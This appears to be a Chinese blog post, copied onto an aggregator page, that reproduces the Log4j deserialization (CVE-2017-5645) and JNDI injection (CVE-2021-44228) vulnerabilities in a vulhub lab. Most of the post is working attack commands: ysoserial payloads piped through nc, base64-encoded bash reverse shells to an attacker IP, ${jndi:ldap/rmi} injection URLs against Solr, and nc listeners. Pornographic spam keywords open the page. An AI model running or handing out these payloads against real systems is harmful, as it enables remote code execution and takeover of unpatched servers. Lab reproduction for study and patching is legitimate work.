国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Log4j反序列化命令執(zhí)行漏洞(CVE-2017-5645)&Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

這篇具有很好參考價(jià)值的文章主要介紹了Log4j反序列化命令執(zhí)行漏洞(CVE-2017-5645)&Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)。希望對大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

一.Log4j反序列化命令執(zhí)行漏洞(CVE-2017-5645)

Apache Log4j是一個(gè)用于Java的日志記錄庫,其支持啟動(dòng)遠(yuǎn)程日志服務(wù)器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻擊者可利用該漏洞執(zhí)行任意代碼

環(huán)境:vulhub
工具下載地址:
ysoserial

利用工具生成payload:

#創(chuàng)建文件
java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/test" | nc 192.168.85.128 4712

#反彈shell
#把 bash -i >& /dev/tcp/192.168.85.129/4466 0>&1進(jìn)行base64編碼
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,IGJhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC44NS4xMjkvNDQ2NiAwPiYx}|{base64,-d}|{bash,-i}" | nc 192.168.85.128 4712

1.創(chuàng)建文件 進(jìn)入容器內(nèi)部,查看文件創(chuàng)建成功

docker ps
docker exec -it 19bdcb0184e1 /bin/bash
cd /tmp 
ls

2.查看反彈的shell
有點(diǎn)問題沒反彈成功,應(yīng)該是這樣做的

nc -lvvp 4466

?二.Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

Apache Log4j 2 是Java語言的日志處理套件,使用極為廣泛。在其2.0到2.14.1版本中存在一處JNDI注入漏洞,攻擊者在可以控制日志內(nèi)容的情況下,通過傳入類似于${jndi:ldap://evil.com/example}的lookup用于進(jìn)行JNDI注入,執(zhí)行任意代碼

環(huán)境:vulhub
工具下載地址:
JNDI-Injection-Exploit
1.利用dnslog平臺(tái)檢測是否有漏洞

后面換成dnslong平臺(tái)的域名
http://192.168.85.128:8983/solr/admin/cores?action=${jndi:ldap://yahs0y.dnslog.cn}

Log4j反序列化命令執(zhí)行漏洞(CVE-2017-5645)&Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228),中間件&框架漏洞復(fù)現(xiàn),log4j,apache
2.利用工具反彈shell
(1)使用工具生成payload

1.把bash -i >& /dev/tcp/192.168.85.129/4444 0>&1進(jìn)行base64編碼 填入echo后,-A參數(shù)后填入攻擊機(jī)的ip
2.利用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg1LjEyOS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.85.129

(2)選用一個(gè)作為url action后的payload,訪問此url
Log4j反序列化命令執(zhí)行漏洞(CVE-2017-5645)&Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228),中間件&框架漏洞復(fù)現(xiàn),log4j,apache這里選用第一個(gè),下面的url訪問

http://192.168.85.128:8983/solr/admin/cores?action=${jndi:rmi://192.168.85.129:1099/itx5mr}

(3)攻擊機(jī)開啟監(jiān)聽

nc -lvvp 4444

Log4j反序列化命令執(zhí)行漏洞(CVE-2017-5645)&Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228),中間件&框架漏洞復(fù)現(xiàn),log4j,apache

參考文章:
CVE-2021-44228文章來源地址http://www.zghlxwxcb.cn/news/detail-667027.html

到了這里,關(guān)于Log4j反序列化命令執(zhí)行漏洞(CVE-2017-5645)&Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 【java安全】Log4j反序列化漏洞

    【java安全】Log4j反序列化漏洞

    關(guān)于Apache Log4j Log4j是Apache的開源項(xiàng)目,可以實(shí)現(xiàn)對System.out等打印語句的替代,并且可以結(jié)合spring等項(xiàng)目,實(shí)現(xiàn)把日志輸出到控制臺(tái)或文件等。而且它還可以通過一個(gè)配置文件來靈活地進(jìn)行配置,而不需要修改應(yīng)用的代碼,滿足了大多數(shù)要求。 就是用來打印日志的 漏洞成因

    2024年02月11日
    瀏覽(23)
  • Web攻防--JNDI注入--Log4j漏洞--Fastjson反序列化漏洞

    Web攻防--JNDI注入--Log4j漏洞--Fastjson反序列化漏洞

    什么是JNDI JNDI全稱為 Java Naming and Directory Interface(Java命名和目錄接口),是一組應(yīng)用程序接口,為開發(fā)人員查找和訪問各種資源提供了統(tǒng)一的通用接口,可以用來定義用戶、網(wǎng)絡(luò)、機(jī)器、對象和服務(wù)等各種資源。 JNDI支持的服務(wù)主要有:DNS、LDAP、CORBA、RMI等。 簡單從安全角度

    2024年02月09日
    瀏覽(26)
  • shiro反序列化和log4j

    shiro反序列化和log4j

    進(jìn)入vulhb目錄下的weblogic,復(fù)現(xiàn)CVE-2018-2894漏洞: 查看docker-compose的配置文件: 如圖,里面有一個(gè)鏡像文件的信息和服務(wù)名,以及它的 端口號 (后面要用): 然后使用下面命令,搭建docker-compose并啟動(dòng): 如圖,安裝成功: 原理如下

    2024年02月07日
    瀏覽(25)
  • Solr Shiro Log4j2 命令執(zhí)行--文件讀取--反序列化--身份權(quán)限繞過--命令執(zhí)行

    Solr Shiro Log4j2 命令執(zhí)行--文件讀取--反序列化--身份權(quán)限繞過--命令執(zhí)行

    Apache Velocity是一個(gè)基于Java的模板引擎,它提供了一個(gè)模板語言去引用由Java代碼定義的對象。Velocity是Apache基金會(huì)旗下的一個(gè)開源軟件項(xiàng)目,旨在確保Web應(yīng)用程序在表示層和業(yè)務(wù)邏輯層之間的隔離(即MVC設(shè)計(jì)模式)。 Apache Solr 5.0.0版本至8.3.1版本中存在輸入驗(yàn)證錯(cuò)誤漏洞。攻擊

    2024年02月08日
    瀏覽(28)
  • 036-安全開發(fā)-JavaEE應(yīng)用&第三方組件&Log4j日志&FastJson序列化&JNDI注入

    036-安全開發(fā)-JavaEE應(yīng)用&第三方組件&Log4j日志&FastJson序列化&JNDI注入

    1、JavaEE-組件安全-Log4j 2、JavaEE-組件安全-Fastjson 3、JavaEE-基本了解-JNDI-API 演示案例: ?Java-三方組件-Log4JJNDI ?Java-三方組件-FastJson反射 Jar倉庫: https://mvnrepository.com/ Maven配置: https://www.jb51.net/article/259780.htm JNDI相關(guān)概念: 1、JNDI是一個(gè)接口,在這個(gè)接口下會(huì)有多種目錄系統(tǒng)

    2024年02月21日
    瀏覽(18)
  • Log4j2 反序列化漏洞與復(fù)現(xiàn)

    Log4j → Log for Java ,Apache的開源日志記錄組件 JDK →1.8u21以下的版本 CVE-2021-44228 遠(yuǎn)程代碼執(zhí)行 →2.15.0修復(fù) CVE-2021-45046 拒絕服務(wù)Dos →2.16.0修復(fù) CVE-2021-45105 拒絕服務(wù)Dos →2.17.0修復(fù) CVE-2021-44832 遠(yuǎn)程代碼執(zhí)行 →2.17.1修復(fù) Log4j為了輸出日志時(shí)能輸出任意位置的Java對象,引入了Looku

    2024年02月05日
    瀏覽(29)
  • CVE-2021-44228 Apache log4j 遠(yuǎn)程命令執(zhí)行漏洞

    CVE-2021-44228 Apache log4j 遠(yuǎn)程命令執(zhí)行漏洞

    一、漏洞原理 log4j(log for java)是由Java編寫的可靠、靈活的日志框架,是Apache旗下的一個(gè)開源項(xiàng)目,使用Log4j,我們更加方便的記錄了日志信息,它不但能控制日志輸出的目的地,也能控制日志輸出的內(nèi)容格式;通過定義不同的日志級別,可以更加精確的控制日志的生成過程,

    2024年02月08日
    瀏覽(33)
  • Log4j遠(yuǎn)程代碼執(zhí)行漏洞

    Log4j遠(yuǎn)程代碼執(zhí)行漏洞

    簡介 漏洞描述 Apache Log4j 是 Apache 的一個(gè)開源項(xiàng)目,Apache log4j-2 是 Log4j 的升級,我們可以控制日志信息輸送的目的地為控制臺(tái)、文件、GUI組件等,通過定義每一條日志信息的級別,能夠更加細(xì)致地控制日志的生成過程。 Log4j-2中存在JNDI注入漏洞,當(dāng)程序?qū)⒂脩糨斎氲臄?shù)據(jù)日志

    2024年02月11日
    瀏覽(25)
  • log4j漏洞詳解

    log4j漏洞詳解

    log4j全名就是(log for java),就是apache的一個(gè)開源的日志記錄組件 ,它在Java項(xiàng)目中使用的比較廣泛。 使用方法: ??????????????? 1.pom引入依賴 ??????????????? 2.獲取logger實(shí)例 ??????????????? 3.logger.info() debug() error() warn()... 優(yōu)點(diǎn):功能豐富,易于集成

    2024年02月16日
    瀏覽(23)
  • log4j JNDI注入漏洞

    目錄 log4j JNDI注入漏洞 一、LDAP介紹 二、JDBC介紹 三、JNDI介紹 四、JNDI命名引用 五、log4j JNDI注入漏洞 ?LDAP是一種協(xié)議,LDAP 的全稱是 Lightweight Directory Access Protocol,輕量目錄訪問協(xié)議。 ?JDBC是一種規(guī)范,JDBC的全稱是Java數(shù)據(jù)庫連接(Java Database connect),它是一套用于執(zhí)行SQL語句

    2024年02月01日
    瀏覽(28)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包